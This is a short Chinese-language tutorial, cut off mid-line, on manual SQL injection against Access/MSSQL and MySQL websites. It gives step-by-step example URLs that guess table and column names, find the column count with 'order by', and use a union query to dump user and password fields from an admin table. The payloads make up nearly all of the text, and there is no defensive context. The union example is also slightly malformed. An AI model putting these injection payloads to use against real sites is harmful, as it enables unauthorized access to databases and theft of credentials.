当网站是access或mssql时, 一们一般是猜表名开始:
http://www.test.com/test.asp?id=1 and exists(select * from 要猜的表名)
当猜出表名时, 我们再猜字段:
http://www.test.com/test.asp?id=1 and exists(select 要猜的字段 from 猜对的表名)
当以上两步做好后, 就可以猜order by 了:
http://www.test.com/test.asp?id=1 order by 字段数
当猜好以上所有时, 就可以把对应的字段显示出来:
http://www.test.com/test.asp?id=1 and 1=2 union 1, 2, 3, 4, user, 6, password, 7 from admin
对于mysql
我们一开始, 一般是猜order by:
http://www.test.com/testphp?id=1 order by 字段长度
当猜到长度后, 可以直接换成mysql黙认的API:
http://ww